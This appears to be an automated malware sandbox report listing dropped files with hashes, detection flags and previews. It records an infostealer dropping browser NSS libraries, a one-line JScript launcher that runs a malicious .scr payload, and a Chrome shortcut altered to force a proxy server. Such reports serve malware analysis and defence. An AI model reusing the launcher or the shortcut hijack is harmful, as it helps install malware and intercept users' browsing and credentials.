Category:	dropped
Size (bytes):	8382
Entropy (8bit):	3.696846452542147
Encrypted:	false
SSDEEP:	192:R6l7wVeJTn6Xd6YOK6Ogr9kEBgmfluEprM89b1bV6sf+vjm:R6lXJT6N6Yz6XkEBgmflu41bVZfe6
MD5:	7F8DB1E46B3CACCFBE0CB9872A3EF994
SHA1:	524C9981D9698A75ABE6EE8805263C690AB5D089
SHA-256:	1F6E623D7D9A896C43262F49588F156F51D2336FE4603BD44B683A6F78463DB9
SHA-512:	8E119B72E7D455348AE275E253586172AD4E7273A4FF8B13167CCCE2D3BC08F60FD8EB1B2AE9F6202A0A9E1CAC03448C18464453875CDEC72ABDB738687D2933
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.2.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B86.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4771
Entropy (8bit):	4.473250916660359
Encrypted:	false
SSDEEP:	48:cvIwWl8zs8Jg77aI9DC5WpW8VYkYm8M4JlJFuZI+q8vZBQhibld:uIjf6I7tCI7VAJkIKDQhibld
MD5:	88E5298E8290910B4F540A9711697D79
SHA1:	1E1451D78558B2DADC4FDD5FD7F71BE269DDCCF3
SHA-256:	04F0E18694C93DCDE2BC93A15CD2C95E64E24C5CF46DC6FBAAADE5D2696C8A4C
SHA-512:	DE3A19D10574201DF1B37CBFEDB17B1EBA9C4F3BBEB941C126406AE189D46E5CCD9429589D6EDF78BA40B71515EA794D624828CD8043C812C336152E5DD5BBC7
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="561310" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5561.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sun Oct 27 04:08:22 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	35026
Entropy (8bit):	1.6079494665907732
Encrypted:	false
SSDEEP:	96:5t8xjeuuA7bt3T0bKi77VQwPFTAJBwWmszIYcIF6fFX+WIkWIFII4undv+cIkpy:sieOpVsT3r8FIF6fFXgundv+cIkp
MD5:	3AF6502C96DA208A5D59CE065F3C62A3
SHA1:	4CD24002E61FCA587628147E9A0F98B321C74AEE
SHA-256:	FE7D147E62E1F0D70BE43F88ABDCEFDE27ACD628A924883D232905FE32B9CB66
SHA-512:	86DC99956F15DA709DC1A69146317C79E4D4981ED749507A4F958385A9835A4BAD325929DF338CA578C27C7B22A2AED985A40067D94C0005981FE04578AF0043
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... ..........g........................d...........................T.......8...........T..............."~......................................................................................................eJ..............GenuineIntel............T.......d......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER55DF.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8368
Entropy (8bit):	3.69279653192781
Encrypted:	false
SSDEEP:	192:R6l7wVeJJ46w466YOU6/Ax4WgmfmxEpr789b+gsfgqm:R6lXJG6S6YV64x4Wgmf8d+zf8
MD5:	6D1AE0D62D6DEC7F5262FC345E1D7D46
SHA1:	7CEA368A542703BEA894A9AA57EFA56DB6F22022
SHA-256:	24EDF59D8F5112639C631B38449814E599500004FBB5BDDBA7A82AFDF1093F9C
SHA-512:	5FFD8D182BF0F3C2309DB649F2840D5526E740C1CE91AFC05A613EB35D5E37F09D15E33A67E294DA64F5BAAE3159EBC6BAFC1402747EE7442E0165F73FE452ED
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER55FF.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4695
Entropy (8bit):	4.454095006891013
Encrypted:	false
SSDEEP:	48:cvIwWl8zsLJg77aI9DC5WpW8VY2Ym8M4JeJFo+q8vNwWcSd:uIjflI7tCI7VKJjKeWcSd
MD5:	89EB9B17F37DD305DED107530D6642B1
SHA1:	151635445F697ECE199EFFC305257D129273F821
SHA-256:	A02F3BF2B1CAE342521F23508B06399124E4A2EBA65C1C5EECBA2E1858E7C5C3
SHA-512:	E44F8A98794E03C85A9E2DF36B18364BE854CC06DC13C0EAA3A4C4F33C59D4ACEF43EADB211263D41050643FB929BBBF61D99A80B90CD2E56CD6D73D37AD7C19
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="561311" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Desktop\Google Chrome.lnk

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 13:16:58 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	3.4521032232832756
Encrypted:	false
SSDEEP:	48:8Sel2dfTXdARYrnvPdAKRkdAGdAKRFdAKRE:8SelO7
MD5:	0CD0C00D97B9C09D2DF0B202EC11B542
SHA1:	B543380703B8D0BFF4A5A1F6DEE0131A2FB1B193
SHA-256:	C880037EE8960AB57BE270E737B5F6B63FB20F3173F69E68B4A5605BE0612A43
SHA-512:	2001FDD8FD07DDBFCCECC179CE7733C04BAE477555EFDC08FAD161106C92459ECFF3D6C17E051222E3307684932B583CE5FD561AFFEF4F898C6594277AA6A3E7
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ......,......~o.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDW.r....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWUl....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWUl....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWUl..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDW.r..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r

C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js

Download File

Process:	C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	175
Entropy (8bit):	4.683665567300122
Encrypted:	false
SSDEEP:	3:RiMIpGXIdPHo55wWAX+aJp6/h4EkD5iXltLwvHFZo5uWAX+aJp6/h4EkD5iXltUM:RiJBJHonwWDaJ0/hJkDQtMHFywWDaJ0V
MD5:	25FABDFF6FD3A6E33179A888FF9AB827
SHA1:	5E2336A3873FA76532163F2684054CE18B67458A
SHA-256:	B9436DF316EE0E2C7DC80817710B530594AF4901A4A14CCCDCC2B7F12AC72A9C
SHA-512:	ABA139B84EDE62B27420BB28BC2E0BE21A191EF06976849429D96FE47CEB0432645430386B735B04D083C25FE7F1A431242AF07EAB3A2435FA27D7DB13F56800
Malicious:	false
Reputation:	unknown
Preview:	new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\GreenTech Dynamics\\EcoCraft.scr\" \"C:\\Users\\user\\AppData\\Local\\GreenTech Dynamics\\O\"")

C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr

Download File

Process:	C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\GreenTech Dynamics\O

Download File

Process:	C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
File Type:	data
Category:	dropped
Size (bytes):	594650
Entropy (8bit):	7.9996649139256055
Encrypted:	true
SSDEEP:	12288:38tfmUx7zSsIfrhCw5PeXvQXFSSdHDBu4ceeEl2a/uJ2:38hxasKfPeXv4AgHFu4c4l9/Z
MD5:	4B0812FABC1BA34D8D45D28180F6C75F
SHA1:	B9D99C00A6F9D5F23E244CC0555F82A7D0EEB950
SHA-256:	73312C3EA63FAF89E2067E034A9148BF73EFB5140C1BA6A67AAF62170EE98103
SHA-512:	7F72FFD39F7B66EA701EC642A427C90F9C3EE9BE69A3E431C492BE76AE9A73E8B2B1FBB16553A5A6D8722BAF30B2A392A47C7C998D618459BF398D47D218D158
Malicious:	false
Reputation:	unknown
Preview:	A@2..3Y.....8p.!..L.[...`..b..f^..J....P@....;.:.."....g...Tz.....T%.R.G.....0$.....n.....r0....R-A..z.N..jK...y.....;.EWs.@b....{....Y9p.)J.....s ;..9.j.........X.K..\|...e..i...`.c..U.h..%...[..b.....n..:Y....M........W>H.....?..O.[......{...7.....C/.!0..\|[&....f.q......}..Q.....+-o.y./T...%..K...vl;4..z."...k:..2[.v.o..{..c5...%...:..kZU1.J?..TI...!...\3_..&L.[{..4..G>..;.%..'...6.q..2....V_.^.....R...g.......<..%.5.j..3.-.o.aj..............j.8aw.6_e}....Z".WLw"S...,....'..6...P.=..xckw}......b..K..h..ad....m{&h...;.o.yR..9.....Q..E.b.....2m..E.r.N..8.u.Q4.m..ht.ck.&f.g...$.....3by..B.V1#.G..y..IL.j......2...\..A..^..T.5....+...W=.Z.[.z....X`.&..z.h...B....\|xs..H&X..Nv..k.5.s.Z...:~9.V.M.PO&.@..m....P.K......".Ju..?.._:%qp.ON..q.....c.AN$N..-MB.q..-.hz.+..O.B.+<~...f..V..5.C"EY..=D..\|.....;.e.\|.g.0.^i..f.._e:...0/.....'.[.........A.1.RY.6}..l.Kf....$.7.N...[ml.W......[.$...p..[H>.+....}.H.....\H2[.'.p......./..z.@...J....-....

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\13a34faa3c.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Cd0bGrjt9g.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Cd0bGrjt9g.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ofHIebp8us.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\ofHIebp8us.exe
